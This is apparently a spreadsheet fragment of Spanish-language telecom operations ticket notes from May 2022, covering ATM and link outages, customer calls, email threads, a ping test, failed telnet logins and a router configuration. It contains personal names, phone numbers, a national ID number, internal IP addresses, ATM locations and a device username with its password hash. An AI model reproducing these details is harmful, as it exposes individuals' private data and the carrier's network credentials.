LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA AL SITIO PARA VERIFICAR EL ESTADO DE LOS EQUIPOS Y EL MEDIO, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LA VISITA EN CONJUNTO PARA APERTURA DEL ATM PARA EL DÍA DE MAÑANA LUNES 23/05/22 A LAS 10:00 HRS.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
NOMBRE
JUAREZ GONZALEZ, BILLY DAVID  IBM: 612059     DPI:1594145121202
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL Y CONFIRMAN EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001635331</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE SOLICITANDO LA VISITA PARA LAS 13:00 HRS
DE: KRISTIAN LARIOS &lt;KLARIOS@5B.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 9:32
PARA: OSCAR PORTILLO &lt;OPORTILLO@5B.COM.GT&gt;; MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;; CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; ENLACES &lt;ENLACES@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: VISITA TÉCNICA ATM_4828 || ID: 47503900T || 3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS
BUENOS DÍAS
CLARO
FAVOR DE COORDINARLO PARA LAS 13 HRS
SALUDOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>|| CLIENTE AUTORIZA VISITA PARA MAÑANA LUNES A LAS 10 AM ||
ASUNTO: VISITA TÉCNICA ATM_4828 || ID: 47503900T || 3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS
OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;
BUENAS TARDES;
SE CONFIRMA LA COORDINACIÓN PARA EL DÍA DE MAÑANA LUNES 23/05/2,022, PARA LAS 10:00 A.M.
SALUDOS CORDIALES;</t>
  </si>
  <si>
    <t>SE MANDA CORREO A CLIENTE SOLICITANDO INDICAR FECHA Y HORA PARA VISITA
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 10:43PARA: OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;; CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; ENLACES &lt;ENLACES@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;ASUNTO: RE: VISITA TÉCNICA ATM_4828 || ID: 47503900T || 3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS
BUEN DÍA ESTIMADOS.
EN LA VISITA REALIZADA EN CONJUNTO AL ATM PERSONAL DE QUE SE PRESENTÓ PARA LA APERTURA DEL CAJERO NOS COMENTA QUE TIENEN PROBLEMAS CON EL EQUIPO, POR LO QUE SOLICITAN RE COORDINAR VISITA EN LO QUE ELLOS RELAZAN LA CORRECCIÓN, NOS APOYAN EN INDICARNOS FECHA Y HORA PARA REPROGRAMAR VISITA, QUEDAMOS ATENTOS A LOS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4573208</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 22 DE MAYO DE 2022 13:51PARA: USCTELECOMUNICACIONES@ICASA.COM.GT &lt;USCTELECOMUNICACIONES@ICASA.COM.GT&gt;; TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_PRONE_GT_ESQUIPUL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3208
ID: 97100266T
IDENTIFICADOR DEL CLIENTE:  CC_PRONE_GT_ESQUIPULAS
UBICADO EN:  COLONIA SAN JOSE OBRERO ZONA 5 ESQUIPULAS CHIQUIMULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4573223</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 22 DE MAYO DE 2022 9:55PARA: CCTELECOMUNICACIONES@GTC.COM.GT &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;; JFUENTES@GTC.COM.GT &lt;JFUENTES@GTC.COM.GT&gt;; CROMERO@GTC.COM.GT &lt;CROMERO@GTC.COM.GT&gt;; DENIS SICA &lt;DSICA@GTC.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE DE INTERNET ALARMADO PARA CLIENTE "CC_GYT_GT_INTERNET_ESQUIPULAS_CHIQUIMULA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3223
ID: 7801128T
IDENTIFICADOR DEL CLIENTE:  CC_GYT_GT_INTERNET_ESQUIPULAS_CHIQUIMULA
UBICADO EN:  2DA AVENIDA 10-20 ZONA 1 ESQUIPULAS CHIQUIMULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4573242</t>
  </si>
  <si>
    <t>SE SOLICITA INFORMACIÓN VIA SKYPE</t>
  </si>
  <si>
    <t>F4573258</t>
  </si>
  <si>
    <t>CORREO INFORMANDO A CLIENTE SOBRE INCIDENTE
DE: MONICA ESTEFANIA BETSABE MARROQUIN SHUTUC
ENVIADO: DOMINGO, 22 DE MAYO DE 2022 10:54
PARA: FORTEZ@PANTALEON.COM &lt;FORTEZ@PANTALEON.COM&gt;
CC: CNOC.CLARONI &lt;CNOC.CLARONI@CLARO.COM.NI&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO PARA EL CLIENTE INGENIO MONTERRO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3258
ID: 5209421ON
IDENTIFICADOR DEL CLIENTE: CC_INGENIO_MONTEROSA_NI_FINCA_ZAPOTILLO
UBICADO EN: CHINANDEGA FINCA ZAPOTILLO (12.622674,-87.272956)
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4573261</t>
  </si>
  <si>
    <t>*/*/*/*SE NOTIFICA A GESTOR JRODRIGUEZ YA QUE CLIENTE REPORTO CAIDA TOTAL Y SE ASOCIÓ A F4573261 A SD1127988*/*/*/</t>
  </si>
  <si>
    <t>F4573286</t>
  </si>
  <si>
    <t>CLIENTE INDICA FALLA ELECTICA EN SECTOR (SE ADJUANTA IMANGE)</t>
  </si>
  <si>
    <t>F4573291</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR SELVIN MEJIA 30179544 Y SE CONTACTA A GESTOR SE DEJA EN LINEA CON CLIENTE **
ID 1001586938
**</t>
  </si>
  <si>
    <t>SE VALIDA QUE ESTA EL TICKET EN PC  Y NO HAY MOVIMIENTO DESDE EL HORARIO  22/05/2022 09:22:48  PERO NO HAY NADA PENDIENTE POR EL CLIENTE, SE MUEVE A WIP, FAVOR DE INDICAR LO PENDIENTE DEL CLIENTE CUANDO ESTE EN ESTE ESTADO PARA NO MOVERLO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALBERTO GARCIA AL 55329047 INDICA EL CONTANTO DEL SEÑOR SELVIN MEJIA 30179544 PARA QUE SE LE LLAME **
ID 1001585882
**</t>
  </si>
  <si>
    <t>F4573298</t>
  </si>
  <si>
    <t>CLIENTE CLAUDIA VALIDA CON TECNICO, EN 1 EQUIPO NO CUENTAN CON CONEXION, POSIBLEMENTE LA TENGAN DESCONECTADA POR LAS MANIPULACIONES REALIZADAS , SERVICIO OPERATIVO, SE PROCEDE A CIERRE</t>
  </si>
  <si>
    <t>F4573328</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 22 DE MAYO DE 2022 14:04PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM145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3328
ID: 47501457T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1459
UBICADO EN:  ATM1459 BANRURAL CAMOTAN BARRIO LA PARROQUIA CAMOTAN CHIQUIMULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4573333</t>
  </si>
  <si>
    <t>**SE LLAMA A GERSON LEONEL TEJEDA  34702637 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001597782
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUSTAVO DÍAZ AL 35722000 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 1001598265
**</t>
  </si>
  <si>
    <t>F4573424</t>
  </si>
  <si>
    <t>SE TIENE EL CONTACTO EL PR RICARDO AL 56233926 ID 1001513396 ATIENDE Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA ESTA FUNCIONANDO CORRECTAMENTE, POR LO QUE SE PROCEDE AL CAMBIO DE ESTADO, PENDIENTE EL CIERRE DEL TICKET CON LA SD</t>
  </si>
  <si>
    <t>F4573561</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 22 DE MAYO DE 2022 16:00
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ROMANO LOPEZ GILBERTO ADOLFO &lt;RLOPEZG@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: DHL LATO I EXPRESS - LATO-NI-EXP-MGA-MGA-04 - CCX-M03157NI-NI5343-NP [4318945] - LINK DOWN || IMDHE020372
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO DHL LATO I EXPRESS, SOLICITAMOS DE SU AMABLE APOYO PARA OBTENER ALGÚN CONTACTO EN PUNTO REMOTO O BIEN DESCARTAR SI YA FUERON REALIZADAS LAS PRUEBAS DE DESCARTES EN SITIO. EN ESTOS MOMENTOS SE OBSERVA EL LINK DOWN HACIA INSTALACIONES, PERO SE OBSERVAN CAÍDAS DESDE EL DÍA DE AYER SOBRE LA INTERFAZ, POR LO QUE SE HACE NECESARIO DESCARTAR TEMAS DE ENERGÍA EN SITIO. DE ANTEMANO GRACIAS. SALUDOS CORDIALES.
GI0/0/20                       DOWN           DOWN     DHL LOS ROBLES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 00 52 55 5174 5290 KARINA MENCIONA QUE PRESENTARON FALLA DE ENERGIA EN PR
-ID 1001564634</t>
  </si>
  <si>
    <t>F4573619</t>
  </si>
  <si>
    <t>SE COONVERSA CON CLIENTE ROBERT BEÑA, INDICA QUE HUBO CORTE DE ENERGIA EN SITIO Y AUTORIZA CIERRE DE TICKETT, ADEMAS SE TIENE CORREO
DE: FRANCISCO REYES MIRANDA ESCOBAR &lt;FMIRANDA@BANCOAGRICOLA.COM.SV&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 8:24
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; VICTOR ANTONIO GARCIA VASQUEZ &lt;VIAGARCI@BANCOAGRICOLA.COM.SV&gt;
CC: MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET#20487786 PERDIDA DE COMUNICACION CON ALTAVISTA-CL-IP2041071
MESA , POR FAVOR CERRAR TICKET.
----------
1001581587
COLA:
NOMBRE: A: 0050325148976
NÚMERO: 0050325148976
DURACIÓN: 0:02:37
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050325148976
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 23/05/2022 09:13:19</t>
  </si>
  <si>
    <t>F4573627</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 58597717 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001566722</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LOPEZ 25069510 MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID 1001567177</t>
  </si>
  <si>
    <t>F4573636</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL AREA DE MONITORE DE CAJEROS 5B QUIEN RESPONDE DANIEL, ME INDICA QUE SE ENVIARA SUPERVISOR PARA QUE NOS APOYE CON REVISAR LOS EQUIPOS Y CONEXIONES DEL ENALCE PRINCIPAL.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:08
FIN: HOY, 17:14
DURACIÓN: 6:14
ID DE LLAMADA: 1001757353</t>
  </si>
  <si>
    <t>MARVIN TOC DE MONITOREO 5B CONFIRMA FALLA SOLVENTADA POR ADMINISTRADOR
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUEN DÍA ATM REVISADOR Y RESUELTA LA FALLA POR EL ADMINISTRADOR ATM YA EN SERVICIO Y DISPENSANDO
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>PERSONAL DE MONITOREO 5B REVISA LA SOLICITUD
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUEN DÍA SE PROCEDE A SU REVISIÓN
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200
DETALLE DE SOLICITUD ATENDIDA
SOLICITANTE
 KENNY.RIVERA
EMAIL
 KENNY.RIVERA@CLARO.COM.GT
CC
ESTADO
 EN EJECUCIÓN
ASUNTO
CAJEROS ATM ATM3322 CAIDA DE SERVICIO
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM3322 SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPO DE ENLACE PRINCIPAL DE MARCA ASMI54L QUE CONECTA AL EQUIPO DE MARCA TELDAT EN ATM ESTE ENERGIZADO, YA QUE PUERTO WAN SE OBSERVA EN ESTADO DOWN. ACTUALMENTE ESTÁ OPERATIVO ÚNICAMENTE POR 3G.
TICKET: F4573636
ID: 47502292T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3322
UBICADO EN: CAJERO 3322 BUSSINES.NET 1 C. 1-09 Z.3 SAN JOSE PINULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA SEGUIMIENTO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM3322 SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPO DE ENLACE PRINCIPAL DE MARCA ASMI54L QUE CONECTA AL EQUIPO DE MARCA TELDAT EN ATM ESTE ENERGIZADO, YA QUE PUERTO WAN SE OBSERVA EN ESTADO DOWN. ACTUALMENTE ESTÁ OPERATIVO ÚNICAMENTE POR 3G.
TICKET: F4573636
ID: 47502292T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3322
UBICADO EN: CAJERO 3322 BUSSINES.NET 1 C. 1-09 Z.3 SAN JOSE PINULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B PARA VALIDAR ALGUN SEGUIMIENTO, ATIENDE DANIEL QUIEN INFORMA QUE EL DIA DE AYER ESTUVIERON TRABAJANDO EN EL ATM , PERO NO TIENEN NINGUNA OTRA INTERVENCION PENDIENTE, SE EL INFORMA PUERTO EN TELDAT DOWN Y EQUIPO ASMI PSIBLEMENTE APAGADO, INFORMA QUE ENVIARA SUPERVISOR PARA VALIDAR, ADICIONAL SE ELE INFORMA QUE SE ENVIARA CORREO PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4573706</t>
  </si>
  <si>
    <t>SE CONSULTO CON PERSONAL DE AZTECA COMENTA QUE EN LA ZONA SE TIENE PROBLEMA DE ENERGIA , POR LO QUE SE TENDRA EN OBSERVACION</t>
  </si>
  <si>
    <t>F4573741</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA HOY A LAS 12:00PM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001657798</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001702069</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 25041690  NO RESPONDE, SE INTENTARA LUEGO **
ID 1001695414
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 25041690  NO RESPONDE, SE INTENTARA LUEGO **
ID 1001685994
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 25041690 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO; SE PIDE APOYO A CNOC CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4573744</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 00 52 55 5174 5290  CONTESTA LA SEÑORITA ILIANA INDICA QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET YA QUE DE SU LADO FUE CERRADO POR LAURA RODRIGUEZ POR ENERGIA**
-ID 1001642391
**</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 22 DE MAYO DE 2022 18:29
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525985OH ::: TICKET CNOC IMGMD005104 ::: "LINK DOWN"
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO ID LOCAL 1525985OH ::: TICKET CNOC IMGMD005104 ::: "LINK DOWN"¿, SOLICITAMOS DE SU AMABLE APOYO PARA OBTENER CONTACTOS TELEFÓNICOS EN PUNTO REMOTO Y PODER REALIZAR PRUEBAS DE PRIMER NIVEL EN CONJUNTO. SE OBSERVA PUERTO DOWN HACIA CLIENTE EN EL EQUIPO DE ACCESO DESDE 2022-05-22 14:57:33. GRACIAS DE ANTEMANO. QUEDAMOS AL PENDIENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001568957 - 1001569327</t>
  </si>
  <si>
    <t>F4573773</t>
  </si>
  <si>
    <t>1001541187
COLA:
NOMBRE: A: 0050378421964
SE LLAMO AL CLIENTE CARLOS BARRIER, QUIEN INDICA QUE LA TIENDA YA CERRO Y SOLICITA VISITA TECNICA. PARA EL DIA DE MAÑANA.
NÚMERO: 0050378421964
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 0050378421964
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/05/2022 18:54:32</t>
  </si>
  <si>
    <t>F4573879</t>
  </si>
  <si>
    <t>SE TRATO DE LLAMAR AL CLIENTE PARA CON FIRMAR OPERATIVIDAD DEL SERVICIO YA QUE POR PARTE DE CLARO SE ENCUENTRA OPERATIVO</t>
  </si>
  <si>
    <t>SE INTENTA NUEVAMENTE LLAMAR AL NUEMRO 24160000 EXT. 83100 COLOCADO EN CONTACTO  KEVIN SICAN DEL TTK PERO NO SE TINE RESPUESTA VIA VIVO. SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>SEÑOR KEVIN SICAN IDICA QUE REPORTO EL  ENLACE INCORRECTO DE DATOS EL CUAL ES UN ENLACE DE INTENET EL QUE POSEE CON NOSOTROS SE PORCEDE CON CIERRE POR PARTE DEL CLIENTE ENLACE MAL REPORTADO</t>
  </si>
  <si>
    <t>NO SE TUVO REPUESTA POR PARTE DEL CLEINTE EL SERVICIO SE ENCUENTRA OPERATIVO SE PORCEDE CON DEJAR EL TICKET EN ETAPA PENDIENTE CLIENTE. SE INTENTARA LUEGO</t>
  </si>
  <si>
    <t>NO SE TIENE GESTION DEL CPE DEL EN EL PUNTO REMOTO PERO SE ENCUENTRA OPERATIVO SE REALIZA PING  A IP PUBLICA DESDE INTERNET POR LO CAUL SE VALIDA QUE SE ENCUENTRA CON SALIDA A INTERNET  SIN PROBLEMAS.
C:\&gt;PING 190.149.175.117
HACIENDO PING A 190.149.175.117 CON 32 BYTES DE DATOS:
RESPUESTA DESDE 190.149.175.117: BYTES=32 TIEMPO=12MS TTL=248
RESPUESTA DESDE 190.149.175.117: BYTES=32 TIEMPO=13MS TTL=248
RESPUESTA DESDE 190.149.175.117: BYTES=32 TIEMPO=18MS TTL=248
RESPUESTA DESDE 190.149.175.117: BYTES=32 TIEMPO=12MS TTL=248
ESTADÍSTICAS DE PING PARA 190.149.175.117:
    PAQUETES: ENVIADOS = 4, RECIBIDOS = 4, PERDIDOS = 0
    (0% PERDIDOS),
TIEMPOS APROXIMADOS DE IDA Y VUELTA EN MILISEGUNDOS:
    MÍNIMO = 12MS, MÁXIMO = 18MS, MEDIA = 13MS
C:\&gt;
&lt;CHMLGTCMN1T2C06B02EIM2&gt;TELNET  VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.24.60     TRYING 10.87.24.60 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.24.60 ...
CC_IGSS_GT_INTERNET_CHIMALTENANGO LOGIN:
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;CHMLGTCMN1T2C06B02EIM2&gt;TELNET  VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.24.60
TRYING 10.87.24.60 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.24.60 ...
CC_IGSS_GT_INTERNET_CHIMALTENANGO LOGIN: GESTIONIP
PASSWORD: ********
LOGIN INCORRECT
CC_IGSS_GT_INTERNET_CHIMALTENANGO LOGIN: GESTIONIP
PASSWORD: *****
LOGIN INCORRECT
CC_IGSS_GT_INTERNET_CHIMALTENANGO LOGIN: GESTIONIP
PASSWORD: ********
LOGIN INCORRECT
LOGIN DISABLED
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;CHMLGTCMN1T2C06B02EIM2&gt;</t>
  </si>
  <si>
    <t>F4573888</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN CON PERDIDAS AL ROUTER CPE | ENLACE INESTABLE.
ROUTER CPE ACTIVO HACE 3 SEMANAS.
UPTIME GENERAL DEL CPE: 3W6D9H44M13S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; RS123W-4G BASE REG_DOMAIN_ROW ROUTER VERSION 11.01.10.00.01
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
;
   ADD DEVICE DIRECT-IP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR0/0
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK NIC CELLULAR0/1
   SET DATA-LINK NIC CELLULAR0/2
   SET DATA-LINK NIC CELLULAR1/1
   SET DATA-LINK NIC CELLULAR1/2
   SET HOSTNAME CC_TYT_GT_ATM1492
   SET HOST-LOCATION "BANRURAL MONTERRICO"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BANNER LOGIN "----------------------------------------------------------------------"
   BANNER LOGIN "-                            CNOC CLARO                              -"
   BANNER LOGIN "----------------------------------------------------------------------"
   BANNER LOGIN "- ESTE EQUIPO ES PROPIEDAD PRIVADA, SI NO TIENE AUTORIZACION         -"
   BANNER LOGIN "- PARA INGRESAR AL EQUIPO, POR FAVOR CANCELE LA CONEXION             -"
;
   USER GESTIONIP HASH-PASSWORD 09265F35E5E79BC2913779FF24DA92A1
;
   GLOBAL-PROFILES DIAL
; -- DIAL PROFILES CONFIGURATION --
      PROFILE CLARO_TYT DEFAULT
      PROFILE CLARO_TYT DIALOUT
      PROFILE CLARO_TYT 3GPP-APN TYT.CLARO
      PROFILE CLARO_TYT 3GPP-PDP-TYPE IPV4V6
;
   EXIT
;
   FEATURE CLASS-MAP
; -- CLASS-MAP MENU CONFIGURATION --
      CLASS-MAP "RESTRICCION_1M"
         ENTRY 1 DEFAULT
         ENTRY 1 PERMIT
;
      EXIT
;
   EXIT
;
   FEATURE POLICY-MAP
; -- POLICY-MAP MENU CONFIGURATION --
      POLICY-MAP "RESTRICCION_1M"
         CLASS RESTRICCION_1M CONFIGURATION
            POLICE 1024 1536 4096
         EXIT
;
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/0
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "LAN DE CLIENTE"
      DESCRIPTION "LAN DE CLIENTE"
      DESCRIPTION "LAN DE CLIENTE"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.233.81.121 255.255.255.252
;
      SERVICE-POLICY RESTRICCION_1M INPUT
;
;
      REPEATER-SWITCH
; -- SWITCH USER CONFIG --
         PORT 2 DISABLE
         PORT 3 DISABLE
         PORT 4 DISABLE
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47502538T/_/"
      DESCRIPTION "WAN PRINCIPAL/_/47502538T/_/"
      DESCRIPTION "WAN PRINCIPAL/_/47502538T/_/"
;
      IP ADDRESS 10.103.15.36 255.255.255.128
;
   EXIT
;
   NETWORK CELLULAR1/0
; -- INTERFACE AT. CONFIGURATION  --
      COVERAGE-TIMER 15
      REGISTRATION-APN TYT.CLARO PDP-TYPE IPV4V6
;
      RECORD-CHANGES ENABLE
;
      NETWORK DOMAIN CS+PS
   EXIT
;
;
   NETWORK DIRECT-IP10
